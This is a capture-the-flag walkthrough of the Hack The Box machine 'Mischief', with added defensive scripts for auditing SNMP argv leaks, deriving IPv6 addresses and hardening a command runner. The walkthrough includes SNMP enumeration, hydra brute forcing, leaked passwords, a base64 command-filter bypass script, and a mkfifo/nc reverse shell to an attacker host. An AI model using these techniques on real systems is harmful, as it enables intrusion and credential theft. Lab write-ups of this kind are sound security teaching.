Description

- Name: `Mischief`

- IP: `10.10.10.92`

- Author: `trickster0`

- Difficulty: `6.4/10`

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.92

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
|   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
3366/tcp open  caldav  Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth:
| HTTP/1.0 401 Unauthorized\x0D
|_  Basic realm=Test
|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap -sV -sC -sU --top-ports 1000 10.10.10.92

PORT    STATE SERVICE REASON
161/udp open  snmp    udp-response ttl 63

For the SNMP port we ran a more detailed scan:

nmap -sU -p 161 --script default,snmp-info 10.10.10.92

PORT    STATE SERVICE
161/udp open  snmp
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: b6a9f84e18fef95a00000000
|   snmpEngineBoots: 19
|_  snmpEngineTime: 24m25s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
|     IP address: 10.10.10.92  Netmask: 255.255.255.0
|     MAC address: 00:50:56:b9:73:1a (VMware)
|     Type: ethernetCsmacd  Speed: 1 Gbps
|_    Traffic stats: 2.36 Mb sent, 17.58 Mb received
| snmp-netstat:
|   TCP  0.0.0.0:22       0.0.0.0:0
|   TCP  0.0.0.0:3366     0.0.0.0:0
|   TCP  127.0.0.1:3306   0.0.0.0:0
|   TCP  127.0.0.53:53    0.0.0.0:0
|   UDP  0.0.0.0:161      *:*
|   UDP  0.0.0.0:48675    *:*
|_  UDP  127.0.0.53:53    *:*

| snmp-processes:
|   1:
|     Name: systemd
|     Path: /sbin/init
|     Params: maybe-ubiquity
|   2:
|     Name: kthreadd
|   3:
|     Name: kworker/0:0
|   4:
|     Name: kworker/0:0H
|   5:
|     Name: kworker/u2:0
|   6:
|     Name: mm_percpu_wq
|   7:
|     Name: ksoftirqd/0
|   8:
|     Name: rcu_sched
|   9:
|     Name: rcu_bh
|   10:
|     Name: migration/0
|   11:
|     Name: watchdog/0
|   12:
|     Name: cpuhp/0
|   13:
|     Name: kdevtmpfs
|   14:
|     Name: netns
|   15:
|     Name: rcu_tasks_kthre
|   16:
|     Name: kauditd
|   17:
|     Name: khungtaskd
|   18:
|     Name: oom_reaper
|   19:
|     Name: writeback
|   20:
|     Name: kcompactd0
|   21:
|     Name: ksmd
|   22:
|     Name: khugepaged
|   23:
|     Name: crypto
|   24:
|     Name: kintegrityd
|   25:
|     Name: kblockd
|   26:
|     Name: ata_sff
|   27:
|     Name: md
|   28:
|     Name: edac-poller
|   29:
|     Name: devfreq_wq
|   30:
|     Name: watchdogd
|   34:
|     Name: kswapd0
|   35:
|     Name: ecryptfs-kthrea
|   77:
|     Name: kthrotld
|   78:
|     Name: acpi_thermal_pm
|   79:
|     Name: scsi_eh_0
|   80:
|     Name: scsi_tmf_0
|   81:
|     Name: scsi_eh_1
|   82:
|     Name: scsi_tmf_1
|   85:
|     Name: kworker/0:2
|   89:
|     Name: ipv6_addrconf
|   98:
|     Name: kstrp
|   115:
|     Name: charger_manager
|   164:
|     Name: mpt_poll_0
|   165:
|     Name: mpt/0
|   166:
|     Name: kworker/0:1H
|   204:
|     Name: scsi_eh_2
|   205:
|     Name: scsi_tmf_2
|   206:
|     Name: ttm_swap
|   208:
|     Name: irq/16-vmwgfx
|   272:
|     Name: raid5wq
|   323:
|     Name: jbd2/sda2-8
|   324:
|     Name: ext4-rsv-conver
|   372:
|     Name: vmtoolsd
|     Path: /usr/bin/vmtoolsd
|   373:
|     Name: systemd-journal
|     Path: /lib/systemd/systemd-journald
|   376:
|     Name: iscsi_eh
|   390:
|     Name: lvmetad
|     Path: /sbin/lvmetad
|     Params: -f
|   391:
|     Name: systemd-udevd
|     Path: /lib/systemd/systemd-udevd
|   394:
|     Name: ib-comp-wq
|   396:
|     Name: ib_mcast
|   397:
|     Name: ib_nl_sa_wq
|   401:
|     Name: rdma_cm
|   502:
|     Name: systemd-network
|     Path: /lib/systemd/systemd-networkd
|   509:
|     Name: systemd-timesyn
|     Path: /lib/systemd/systemd-timesyncd
|   515:
|     Name: systemd-resolve
|     Path: /lib/systemd/systemd-resolved
|   539:
|     Name: systemd-logind
|     Path: /lib/systemd/systemd-logind
|   540:
|     Name: networkd-dispat
|     Path: /usr/bin/python3
|     Params: /usr/bin/networkd-dispatcher
|   541:
|     Name: lxcfs
|     Path: /usr/bin/lxcfs
|     Params: /var/lib/lxcfs/
|   544:
|     Name: atd
|     Path: /usr/sbin/atd
|     Params: -f
|   547:
|     Name: VGAuthService
|     Path: /usr/bin/VGAuthService
|   548:
|     Name: accounts-daemon
|     Path: /usr/lib/accountsservice/accounts-daemon
|   549:
|     Name: cron
|     Path: /usr/sbin/cron
|     Params: -f
|   550:
|     Name: dbus-daemon
|     Path: /usr/bin/dbus-daemon
|     Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
|   553:
|     Name: cron
|     Path: /usr/sbin/CRON
|     Params: -f
|   559:
|     Name: rsyslogd
|     Path: /usr/sbin/rsyslogd
|     Params: -n
|   560:
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
|   573:
|     Name: sh
|     Path: /bin/sh
|     Params: -c /home/loki/hosted/webstart.sh
|   574:
|     Name: polkitd
|     Path: /usr/lib/policykit-1/polkitd
|     Params: --no-debug
|   575:
|     Name: sh
|     Path: /bin/sh
|     Params: /home/loki/hosted/webstart.sh
|   589:
|     Name: python
|     Path: python
|     Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
|   652:
|     Name: sshd
|     Path: /usr/sbin/sshd
|     Params: -D
|   663:
|     Name: iscsid
|     Path: /sbin/iscsid
|   664:
|     Name: iscsid
|     Path: /sbin/iscsid
|   723:
|     Name: mysqld
|     Path: /usr/sbin/mysqld
|     Params: --daemonize --pid-file=/run/mysqld/mysqld.pid
|   727:
|     Name: agetty
|     Path: /sbin/agetty
|     Params: -o -p -- \u --noclear tty1 linux
|   777:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   779:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   780:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   781:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   782:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   783:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1051:
|     Name: kworker/u2:1
|   1070:
|_    Name: kworker/u2:2
| snmp-sysdescr: Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
|_  System uptime: 24m26.08s (146608 timeticks)
| snmp-win32-software:
|   accountsservice-0.6.45-1ubuntu1; 0-01-01T00:00:00
|   acl-2.2.52-3build1; 0-01-01T00:00:00
|   [...]
|   xxd-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
|   xz-utils-5.2.2-1.3; 0-01-01T00:00:00
|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00

Pwn

Loki

Accessing port 3366 in a browser, we are asked for HTTP credentials.

From the SNMP scan we found that PID 589 belongs to a Python process:

|     Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/

The process simply spawns an HTTP server on port 3366 with user "loki" and password "godofmischiefisloki", both passed on the command line, where anyone who can read the SNMP process table sees them.

Simple Network Management Protocol (SNMP) is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. Devices that typically support SNMP include cable modems, routers, switches, servers, workstations, printers, and more.

SNMP is widely used in network management for network monitoring. SNMP exposes management data in the form of variables on the managed systems organized in a management information base (MIB) which describe the system status and configuration. These variables can then be remotely queried (and, in some circumstances, manipulated) by managing applications.
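The credential leak above is worth turning into a check. As an added example (not part of the original writeup), the following Python script parses text in the layout of nmap's `snmp-processes` script and flags command lines that embed credentials, the kind of audit an administrator can run against their own SNMP-exposed hosts. Net-SNMP serves this process table from the HOST-RESOURCES-MIB (`hrSWRunParameters`), so with a readable community string every argv is visible remotely. The sample block is constructed for the example: the `snmpd`, `python` and `mysqld` entries mirror the scan above, while the PID 900 `mysql` entry with `--password=hunter2` is invented.

```python
import re

# Constructed sample in the layout of nmap's snmp-processes output (not the full scan).
# PID 900 and its --password argument are invented for the example.
SAMPLE_SNMP_PROCESSES = """\
| snmp-processes:
|   560:
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
|   589:
|     Name: python
|     Path: python
|     Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
|   723:
|     Name: mysqld
|     Path: /usr/sbin/mysqld
|     Params: --daemonize --pid-file=/run/mysqld/mysqld.pid
|   900:
|     Name: mysql
|     Path: /usr/bin/mysql
|     Params: -u app --password=hunter2 dbpanel
"""

PID_RE = re.compile(r"^\|\s+(\d+):\s*$")
FIELD_RE = re.compile(r"^\|_?\s+(Name|Path|Params):\s*(.*)$")

# A bare "user:secret" token (no path separators, no second colon), e.g. loki:godofmischiefisloki.
USERPASS_RE = re.compile(r"^[A-Za-z0-9_.-]+:[^:/\s]+$")
# Flags whose value is a secret by construction: --password=..., -pass ..., --token ...
SECRET_FLAG_RE = re.compile(r"^--?(password|passwd|pass|pwd|secret|token|api[-_]?key)(=.*)?$", re.I)


def parse_snmp_processes(text):
    """Return {pid: {"Name": ..., "Path": ..., "Params": ...}} from snmp-processes output."""
    procs = {}
    pid = None
    for line in text.splitlines():
        m = PID_RE.match(line)
        if m:
            pid = int(m.group(1))
            procs[pid] = {}
            continue
        m = FIELD_RE.match(line)
        if m and pid is not None:
            procs[pid][m.group(1)] = m.group(2).strip()
    return procs


def find_exposed_secrets(procs):
    """Return (pid, name, reason) for every process whose arguments look like they carry a credential.
    The secret itself is never copied into the finding, only the flag name or the user part."""
    findings = []
    for pid, info in sorted(procs.items()):
        name = info.get("Name", "?")
        for tok in info.get("Params", "").split():
            if SECRET_FLAG_RE.match(tok):
                findings.append((pid, name, "secret-bearing flag: " + tok.split("=")[0]))
                break
            # Skip options, and skip host:port style tokens whose "secret" is purely numeric.
            if not tok.startswith("-") and USERPASS_RE.match(tok) and not tok.rsplit(":", 1)[1].isdigit():
                findings.append((pid, name, "user:password token: " + tok.split(":")[0] + ":***"))
                break
    return findings


if __name__ == "__main__":
    for pid, name, reason in find_exposed_secrets(parse_snmp_processes(SAMPLE_SNMP_PROCESSES)):
        print("PID %d (%s): %s" % (pid, name, reason))
```

The check is a heuristic and will miss secrets hidden in config paths or odd flag spellings; the durable fix is to never pass secrets in argv at all (read them from a file or environment the process owns), and to restrict SNMP itself: a non-default community or SNMPv3 with authentication, plus a firewall rule limiting UDP/161 to the monitoring host.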

With those credentials we can log in on port 3366.

From the main page we found another pair of credentials:

loki godofmischiefisloki

loki trickeryanddeceit

From `snmp-netstat` we saw other sockets bound to all interfaces (`0.0.0.0` and `*:*`):

| snmp-netstat:
|   TCP  0.0.0.0:22       0.0.0.0:0
|   TCP  0.0.0.0:3366     0.0.0.0:0
|   TCP  127.0.0.1:3306   0.0.0.0:0
|   TCP  127.0.0.53:53    0.0.0.0:0
|   UDP  0.0.0.0:161      *:*
|   UDP  0.0.0.0:48675    *:*
|_  UDP  127.0.0.53:53    *:*

so we extended the analysis of the service with `snmpwalk`, which returned two IPv6 addresses.

snmpwalk -v 2c -c public 10.10.10.92

(very long output and scan)

Among the output we also found the IPv6 addresses of the machine:

dead:beef:0000:0000:0250:56ff:feb9:731a

fe80:0000:0000:0000:0250:56ff:feb9:731a
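The two addresses above follow directly from the MAC address reported by `snmp-interfaces` (`00:50:56:b9:73:1a`): their low 64 bits are the modified EUI-64 interface identifier, under the link-local prefix `fe80::/64` and the routed prefix `dead:beef::/64`. As an added example (not part of the original writeup), this Python script derives the identifier and checks it in both directions using only the standard library; the MAC and prefixes come from the scan output, everything else is the example's own.

```python
import ipaddress
from typing import Optional


def eui64_interface_id(mac: str) -> bytes:
    """Build the 64-bit modified EUI-64 interface identifier from a 48-bit MAC (RFC 4291, App. A)."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    # Split the OUI from the NIC-specific half, insert 0xFFFE between them,
    # then flip the universal/local bit (0x02) of the first octet.
    iid = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    iid[0] ^= 0x02
    return bytes(iid)


def slaac_address(prefix: str, mac: str) -> str:
    """Combine a /64 prefix with the EUI-64 identifier into a compressed IPv6 address."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("EUI-64 autoconfiguration needs a /64 prefix")
    iid = int.from_bytes(eui64_interface_id(mac), "big")
    return ipaddress.IPv6Address(int(net.network_address) | iid).compressed


def mac_from_eui64(addr: str) -> Optional[str]:
    """Inverse check: recover the MAC if the address carries an EUI-64 identifier, else None.
    Privacy (RFC 4941) or manually assigned addresses lack the 0xFFFE marker and return None."""
    raw = ipaddress.IPv6Address(addr).packed[8:]
    if raw[3:5] != b"\xff\xfe":
        return None
    first = raw[0] ^ 0x02
    octets = bytes([first]) + raw[1:3] + raw[5:]
    return ":".join("%02x" % b for b in octets)


if __name__ == "__main__":
    # Values from the scan output above (MAC of the VMware NIC and the two observed prefixes).
    mac = "00:50:56:b9:73:1a"
    for prefix in ("fe80::/64", "dead:beef::/64"):
        a = slaac_address(prefix, mac)
        print(prefix, "->", a, "(MAC recovered:", mac_from_eui64(a), ")")
```

Because an EUI-64 address is a pure function of the MAC, a host's IPv6 address is as discoverable as its IPv4 one. That is the defensive lesson of this box: the Apache instance was reachable only over IPv6, so an IPv4-only firewall policy or scan schedule would never have seen it. IPv6 needs the same filtering and the same inventory as IPv4.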

An nmap scan against the IPv6 address finds an Apache server on port 80:

nmap -p 1-65535 -Pn -sV -T4 -6 dead:beef:0000:0000:0250:56ff:feb9:731a

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The page asks for a login and no known vulnerabilities were found in the form, so we started `hydra` with usernames from `namelist.txt` (from `metasploit`) and the two passwords:

godofmischiefisloki

trickeryanddeceit

The program returned a pair of credentials:

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-21 17:33:47
[DATA] max 64 tasks per 1 server, overall 64 tasks, 22908 login tries (l:1909/p:12), ~358 tries per task
[DATA] attacking http-post-form://mischief.htb:80//login.php:user=^USER^&password=^PASS^:Sorry, those credentials do not match
[80][http-post-form] host: mischief.htb   login: administrator   password: trickeryanddeceit

The web form executes any command submitted, but some commands are blacklisted. Among the ones we can use:

- cat

- echo

- ping

- tar

- sh

- source

- sleep

- id

- whoami

- python

The main problem is that we don't get any output.

After many tries we found that we get the output of a command only if we append a second command:

`curl -X POST http://mischief.htb/ --data "command=<cmd1>;<cmd2>"` prints the output of `<cmd1>`.

N.B.: `mischief.htb` is simply an /etc/hosts entry for the IPv6 address.

curl -X POST http://mischief.htb/ -H "Cookie: PHPSESSID=0shjckk27ntheutfa7gpko3763" --data "command=cat /etc/passwd;id"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
loki:x:1000:1004:loki:/home/loki:/bin/bash
Debian-snmp:x:111:113::/var/lib/snmp:/bin/false
mysql:x:112:115:MySQL Server,,,:/nonexistent:/bin/false

We wrote a simple script to interact with the machine:

import requests
from sys import argv

# url = "http://[dead:beef:0000:0000:0250:56ff:feb9:731a]/"   # IPv6 literal form (needs brackets)
url = "http://mischief.htb/"
command = " ".join(argv[1:])
command += ";id"   # the page redirects only the last command's output, so ours reaches the response
r = requests.post(url, data={"command": command})
print(r.text.split("</html>")[1].strip())

We first exfiltrated the MySQL credentials:

$server = 'localhost';
$username = 'debian-sys-maint';
$password = 'nE1S9Aw1L0Ky3Y9h';
$database = 'dbpanel';

Since we can't use `ls`, we need a way around the command filter.

Searching for bypass techniques we found that we can base64-encode the command and then submit

echo -n <aBase64String>|base64 -d|sh

to actually run the original command on the remote machine.

import requests
from base64 import b64encode
from sys import argv

# url = "http://[dead:beef:0000:0000:0250:56ff:feb9:731a]/"   # IPv6 literal form (needs brackets)
url = "http://mischief.htb/"
command = " ".join(argv[1:])
# Encode the real command so none of the blacklisted words appear in the submitted string.
command = "echo -n " + b64encode(command.encode()).decode() + "|base64 -d|sh"
command += ";id"   # second command so the first one's output is not redirected to /dev/null
r = requests.post(url, data={"command": command})
print(r.text.split("</html>")[1].strip())

Now we can run all shell commands!

In /home/loki we found a credentials file (`user.txt` is not readable by www-data):

python cmd_loki.py "cat /home/loki/credentials"
pass: lokiisthebestnorsegod
Command was executed succesfully!

We can now log in over SSH as loki and get the user flag:

User flag

Running LinEnum did not show anything exploitable, and no known exploits exist for the kernel `4.15.0-20`, so we focused on known services that could hide credentials or other useful information.

From MySQL:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dbpanel            |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use dbpanel;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_dbpanel |
+-------------------+
| users             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from users;
+----+---------------+--------------------------------------------------------------+
| id | user          | password                                                     |
+----+---------------+--------------------------------------------------------------+
|  2 | administrator | $2y$10$0OeEYPgdvzU1XTLsKUkaIuyN3PTBQSC4oALTICEZOllPJKq1uUAkq |
+----+---------------+--------------------------------------------------------------+
1 row in set (0.00 sec)

(the bcrypt hash corresponds to the password trickeryanddeceit)

and from .mysql_history:

_HiStOrY_V2_
yse\040mysql;
use\040mysql;
SELECT\040User,\040Host,\040plugin\040FROM\040mysql.user;
FLUSH\040PRIVILEGES;
exit

From /var/www/html/index.php we have the list of blacklisted commands, and it also becomes clear why we need to supply two commands to see the output: the page runs `system("$cmd > /dev/null 2>&1")`, and in a `;`-separated list the redirection binds only to the last simple command, so the output of everything before the `;` still reaches the response.

if(isset($_POST['command'])) {
    $cmd = $_POST['command'];
    if (strpos($cmd, "nc" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "bash" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "chown" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "setfacl" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "chmod" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "perl" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "find" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "locate" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "ls" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "php" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "wget" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "curl" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "dir" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "ftp" ) !== false){
        echo "Command is not allowed.";
    } elseif (strpos($cmd, "telnet" ) !== false){
        echo "Command is not allowed.";
    } else {
        system("$cmd > /dev/null 2>&1");
        echo "Command was executed succesfully!";
    }
}
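As an added example (not from the writeup), here is the filter above rebuilt in Python next to a hardened replacement, so both behaviours the writeup observed can be checked: the substring blacklist lets `cat /etc/passwd;id` through while refusing harmless input that happens to contain `ls`, and the redirect in `system("$cmd > /dev/null 2>&1")` applies only to the last command of a `;` list. The blacklist words are the ones from index.php; the allowlist, its per-argument patterns and the `run_safely` helper are the example's own choices.

```python
import re
import shlex
import subprocess

# The page's PHP filter reproduced in Python: a substring match on the raw command string
# (strpos($cmd, $word) !== false), followed by system("$cmd > /dev/null 2>&1").
BLACKLIST = ["nc", "bash", "chown", "setfacl", "chmod", "perl", "find", "locate",
             "ls", "php", "wget", "curl", "dir", "ftp", "telnet"]


def blacklist_blocks(cmd):
    """True when the substring blacklist rejects cmd. It matches anywhere in the string, so
    'echo tools' is refused (contains 'ls') while 'cat /etc/passwd;id' passes untouched."""
    return any(word in cmd for word in BLACKLIST)


def shell_line_as_executed(cmd):
    """The string the vulnerable page hands to system(). In a ';' list the redirection binds
    only to the last simple command, so output of anything before the ';' still reaches the page."""
    return cmd + " > /dev/null 2>&1"


# Hardened replacement (example design): a fixed allowlist of programs, each with one regex per
# positional argument, parsed with shlex and run with shell=False so ';', '|', '$(...)', backticks
# and redirects are never interpreted by a shell. Option-looking arguments are rejected too.
ALLOWED = {
    "id": [],
    "whoami": [],
    "uptime": [],
    "sleep": [r"^[0-9]{1,2}$"],   # exactly one argument: 0..99 seconds
}


def build_safe_argv(cmd):
    """Return the argv list for an allowlisted command, or raise ValueError."""
    argv = shlex.split(cmd)           # raises ValueError on unbalanced quotes
    if not argv:
        raise ValueError("empty command")
    prog, args = argv[0], argv[1:]
    if prog not in ALLOWED:
        raise ValueError("program not allowed: %r" % prog)
    patterns = ALLOWED[prog]
    if len(args) != len(patterns):
        raise ValueError("%s expects %d argument(s)" % (prog, len(patterns)))
    for arg, pat in zip(args, patterns):
        if arg.startswith("-") or not re.match(pat, arg):
            raise ValueError("argument %r rejected for %s" % (arg, prog))
    return [prog] + args


def run_safely(cmd, timeout=5.0):
    """Validate first, then execute without a shell; stdout and stderr are both returned."""
    argv = build_safe_argv(cmd)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    for probe in ["cat /etc/passwd;id", "echo tools", "ls -la", "id"]:
        print("%-22r blacklist blocks: %-5s -> shell sees: %s"
              % (probe, blacklist_blocks(probe), shell_line_as_executed(probe)))
    print("hardened:", run_safely("id").strip())
```

The two designs differ in where the decision is made: the blacklist inspects a string the shell will later re-parse, so any encoding the shell understands (the base64 pipe used earlier) and any separator it honours (`;`) slips past; the allowlist decides on the already-parsed argv and never gives the shell a chance to interpret anything.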

From loki's bash history we found that he executed `sudo su`, `su` and `sudo -l`, but now those commands return:

bash: /usr/bin/sudo: Permission denied

The history itself:

python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit

Since we know that `sudo` is involved, we returned to `www-data` and spawned a reverse shell (over IPv6) using our RCE:

python cmd_loki.py "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc dead:beef:X::XXXX 4444 >/tmp/f"

From `www-data` we can use `su` and try the passwords we found so far; one of them works, and we get root.

Where is the root flag? Using `find` we locate it.

Root Flag

https://www.hackthebox.eu/profile/1752